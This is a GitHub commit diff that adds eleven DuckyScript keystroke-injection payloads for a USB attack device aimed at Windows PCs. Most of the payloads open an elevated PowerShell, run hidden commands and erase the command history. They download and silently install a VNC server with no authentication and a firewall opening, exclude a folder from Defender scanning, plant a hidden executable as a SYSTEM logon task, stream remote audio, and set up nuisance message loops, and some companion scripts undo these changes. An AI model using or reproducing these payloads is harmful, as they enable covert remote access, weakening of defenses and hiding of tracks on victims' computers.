File tree Expand file tree Collapse file tree 11 files changed +329
-0
lines changed Expand file tree Collapse file tree 11 files changed +329
-0
lines changed Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ STRING PowerShell Start-Process -Verb runAs PowerShell
5+ ENTER
6+ DELAY 5000
7+ ALT y
8+ ALT t
9+ DELAY 5000
10+ REM Resize PowerShell window
11+ STRING mode con cols=20 lines=1
12+ ENTER
13+ REM Run payload in hidden window
14+ STRING Start-Process -WindowStyle Hidden PowerShell "
15+ REM Payload
16+ STRING cd C:\Windows\Registry
17+ STRING taskkill /f /im Registry.exe
18+ STRING Unregister-ScheduledTask -TaskName Registry -Confirm:$false
19+ STRING attrib -s -h .
20+ STRING cd ..
21+ STRING Remove-Item -recurse -force Registry
22+ STRING Remove-MpPreference -ExclusionPath 'C:\Windows\Registry'
23+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
24+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ ESC
3+ DELAY 300
4+ GUI r
5+ DELAY 300
6+ STRING shell:startup
7+ ENTER
8+ DELAY 1500
9+ F4
10+ CTRL a
11+ CTRL x
12+ STRING cmd
13+ ENTER
14+ DELAY 2000
15+ ALT TAB
16+ DELAY 500
17+ ALT F4
18+ DELAY 1000
19+ STRING mode con cols=20 lines=1
20+ ENTER
21+ STRING cd .. &
22+ STRING echo Set oShell = CreateObject ("WScript.Shell") > TaskManager.vbs &
23+ STRING echo Do >> TaskManager.vbs &
24+ STRING echo x=msgbox("Task failed successfully" ,0+16, "Error") >> TaskManager.vbs &
25+ STRING echo oShell.run "TaskManager.vbs" >> TaskManager.vbs &
26+ STRING echo Loop >> TaskManager.vbs &
27+ STRING TaskManager.vbs &
28+ STRING echo Set oWS = WScript.CreateObject("WScript.Shell") > SC.vbs &
29+ STRING echo sLinkFile = "
30+ CTRL v
31+ STRING \TaskManager.lnk" >> SC.vbs &
32+ STRING echo Set oLink = oWS.CreateShortcut(sLinkFile) >> SC.vbs &
33+ STRING echo oLink.TargetPath = "
34+ CTRL v
35+ BACKSPACE
36+ REPEAT 6
37+ STRING TaskManager.vbs" >> SC.vbs &
38+ STRING echo oLink.WorkingDirectory = "
39+ CTRL v
40+ BACKSPACE
41+ REPEAT 7
42+ STRING " >> SC.vbs &
43+ STRING echo oLink.Save >> SC.vbs &
44+ STRING start SC.vbs &
45+ STRING timeout 1 &
46+ STRING del SC.vbs &
47+ STRING exit
48+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ ESC
3+ DELAY 300
4+ GUI r
5+ DELAY 300
6+ STRING shell:startup
7+ ENTER
8+ DELAY 500
9+ F4
10+ CTRL a
11+ STRING cmd
12+ ENTER
13+ DELAY 1500
14+ STRING mode con cols=20 lines=1
15+ ENTER
16+ STRING taskkill /f /im wscript.exe &
17+ STRING del TaskManager.lnk &
18+ STRING cd .. &
19+ STRING del TaskManager.vbs &
20+ STRING exit
21+ ENTER
22+ DELAY 1000
23+ ALT F4
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ REM Start elevated PowerShell
5+ STRING PowerShell Start-Process -Verb runAs PowerShell
6+ ENTER
7+ DELAY 5000
8+ ALT y
9+ ALT t
10+ DELAY 5000
11+ REM Shrink PowerShell window
12+ STRING mode con cols=20 lines=1
13+ ENTER
14+ REM Run payload in hidden PowerShell window
15+ STRING Start-Process -WindowStyle Hidden PowerShell "
16+ REM Payload
17+ STRING cd C:\Windows;
18+ STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/Gyanbu/MalduinoScripts/raw/master/Tvnc.msi','C:\Windows\Tvnc.msi');
19+ STRING msiexec.exe /i Tvnc.msi /quiet /norestart
20+ STRING ADDLOCAL='Server'
21+ STRING SERVER_REGISTER_AS_SERVICE=1
22+ STRING SERVER_ADD_FIREWALL_EXCEPTION=1
23+ STRING SERVER_ALLOW_SAS=1
24+ STRING SET_USEVNCAUTHENTICATION=1
25+ STRING VALUE_OF_USEVNCAUTHENTICATION=0
26+ STRING SET_REMOVEWALLPAPER=1
27+ STRING VALUE_OF_REMOVEWALLPAPER=0
28+ STRING SET_RUNCONTROLINTERFACE=1
29+ STRING VALUE_OF_RUNCONTROLINTERFACE=0 | Out-Null;
30+ STRING Remove-Item Tvnc.msi
31+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
32+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ REM Start elevated PowerShell
5+ STRING PowerShell Start-Process -Verb runAs PowerShell
6+ ENTER
7+ DELAY 5000
8+ ALT y
9+ ALT t
10+ DELAY 5000
11+ REM Shrink PowerShell window
12+ STRING mode con cols=20 lines=1
13+ ENTER
14+ REM Run payload in hidden PowerShell window
15+ STRING Start-Process -WindowStyle Hidden PowerShell "
16+ REM Payload
17+ STRING cd C:\Windows;
18+ STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/Gyanbu/MalduinoScripts/raw/master/Tvnc.msi','C:\Windows\Tvnc.msi');
19+ STRING msiexec.exe /x Tvnc.msi /quiet /norestart | Out-Null;
20+ STRING Remove-Item Tvnc.msi
21+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
22+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ STRING PowerShell Start-Process -Verb runAs PowerShell
5+ ENTER
6+ DELAY 5000
7+ ALT y
8+ ALT t
9+ DELAY 5000
10+ REM Resize PowerShell window
11+ STRING mode con cols=20 lines=1
12+ ENTER
13+ STRING Register-ScheduledTask Regedit
14+ STRING -Action (New-ScheduledTaskAction -Execute PowerShell -Argument "Start-process -WindowStyle Hidden PowerShell '(New-Object System.Media.SoundPlayer C:\Windows\Jjgw.wav).PlaySync()'")
15+ STRING -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1)) -f;
16+ ENTER
17+ REM Run payload in hidden window
18+ STRING Start-Process -WindowStyle Hidden PowerShell "
19+ REM Payload
20+ STRING Invoke-WebRequest https://github.com/Gyanbu/MalduinoScripts/raw/master/Jjgw.wav -OutFile C:\Windows\Jjgw.wav
21+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
22+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ STRING PowerShell Start-Process -Verb runAs PowerShell
5+ ENTER
6+ DELAY 5000
7+ ALT y
8+ ALT t
9+ DELAY 5000
10+ REM Resize PowerShell window
11+ STRING mode con cols=20 lines=1
12+ ENTER
13+ REM Run payload in hidden window
14+ STRING Start-Process -WindowStyle Hidden PowerShell "
15+ REM Payload
16+ STRING Remove-Item C:\Windows\Jjgw.wav;
17+ STRING Unregister-ScheduledTask -TaskName Regedit -Confirm:$false
18+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
19+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ REM Open Run prompt
3+ GUI r
4+ DELAY 1000
5+ REM Start elevared PowerShell
6+ STRING PowerShell Start-Process -Verb runAs PowerShell
7+ ENTER
8+ DELAY 5000
9+ ALT y
10+ ALT t
11+ DELAY 5000
12+ REM Shrink PowerShell window
13+ STRING mode con cols=20 lines=1
14+ ENTER
15+ STRING Register-ScheduledTask VLC
16+ STRING -Action (New-ScheduledTaskAction -Execute 'C:\Windows\VLC\vlc.exe' -Argument "-I null rtsp://192.168.0.16:6969/Music.sdp --loop" -WorkingDirectory 'C:\Windows\VLC')
17+ STRING -Trigger (New-ScheduledTaskTrigger -AtLogon)
18+ STRING -Principal (New-ScheduledTaskPrincipal -UserID 'NT AUTHORITY\SYSTEM' -LogonType ServiceAccount -RunLevel Highest) -f;
19+ REM Preparing hidden PowerShell window for payload
20+ STRING Start-Process -WindowStyle Hidden PowerShell "
21+ REM Payload
22+ STRING cd C:\Windows;
23+ STRING Mkdir VLC;
24+ STRING (New-Object System.Net.WebClient).DownloadFile('https://github.com/Gyanbu/MalduinoScripts/raw/master/VLC.zip','C:\Windows\VLC.zip');
25+ STRING Expand-Archive -Path VLC.zip -force;
26+ STRING Remove-Item VLC.zip;
27+ STRING cd VLC;
28+ STRING attrib +s +h /s /d;
29+ STRING attrib +s +h .;
30+ STRING New-NetFirewallRule -DisplayName 'VLC' -Direction Inbound -Program 'C:\Windows\VLC\vlc.exe' -Action Allow;
31+ STRING .\vlc -I null rtsp://192.168.0.16:6969/Music.sdp --loop
32+ REM End of payload
33+ REM Clear PowerShell history and exit
34+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
35+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ GUI r
3+ DELAY 1000
4+ STRING PowerShell Start-Process -Verb runAs PowerShell
5+ ENTER
6+ DELAY 5000
7+ ALT y
8+ ALT t
9+ DELAY 5000
10+ REM Resize PowerShell window
11+ STRING mode con cols=20 lines=1
12+ ENTER
13+ REM Run payload in hidden window
14+ STRING Start-Process -WindowStyle Hidden PowerShell "
15+ REM Payload
16+ STRING cd C:\Windows\VLC
17+ STRING Stop-ScheduledTask -TaskName "VLC"
18+ STRING Unregister-ScheduledTask -TaskName VLC -Confirm:$false
19+ STRING attrib -s -h .
20+ STRING cd ..
21+ STRING Remove-Item -recurse -force VLC
22+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
23+ ENTER
Original file line number Diff line number Diff line change 1+ DELAY 1000
2+ REM Open Run prompt
3+ GUI r
4+ DELAY 1000
5+ REM Start elevated PowerShell
6+ STRING PowerShell Start-Process -Verb runAs PowerShell
7+ ENTER
8+ DELAY 5000
9+ ALT y
10+ ALT t
11+ DELAY 5000
12+ REM Shrink PowerShell window
13+ STRING mode con cols=20 lines=1
14+ ENTER
15+ REM Preparing hidden PowerShell window for payload
16+ STRING Start-Process -WindowStyle Hidden PowerShell "
17+ REM Payload
18+ STRING Add-MpPreference -ExclusionPath C:\Windows\Registry;
19+ STRING (Get-Volume -FileSystemLabel Ventoy).DriveLetter + ':\'|cd;
20+ STRING cp Registry.zip C:\Windows\Registry.zip;
21+ STRING cd C:\Windows;
22+ STRING Mkdir Registry;
23+ STRING Expand-Archive -Path Registry.zip -force;
24+ STRING Remove-Item Registry.zip;
25+ STRING cd Registry;
26+ STRING attrib +s +h /s /d;
27+ STRING attrib +s +h .;
28+ STRING New-NetFirewallRule -DisplayName 'Registry' -Direction Inbound -Program 'C:\Windows\Registry\Registry.exe' -Action Allow;
29+ STRING Register-ScheduledTask Registry
30+ STRING -Action (New-ScheduledTaskAction -Execute 'C:\Windows\Registry\Registry.vbs' -WorkingDirectory 'C:\Windows\Registry')
31+ STRING -Trigger (New-ScheduledTaskTrigger -AtLogon)
32+ STRING -Principal (New-ScheduledTaskPrincipal -UserID 'NT AUTHORITY\SYSTEM' -LogonType ServiceAccount -RunLevel Highest) -f;
33+ STRING .\Registry.vbs
34+ REM End of payload
35+ REM Clear PowerShell history and exit
36+ STRING ";(Get-PSReadlineOption).HistorySavePath | rm;exit
37+ ENTER
You can’t perform that action at this time.
0 commit comments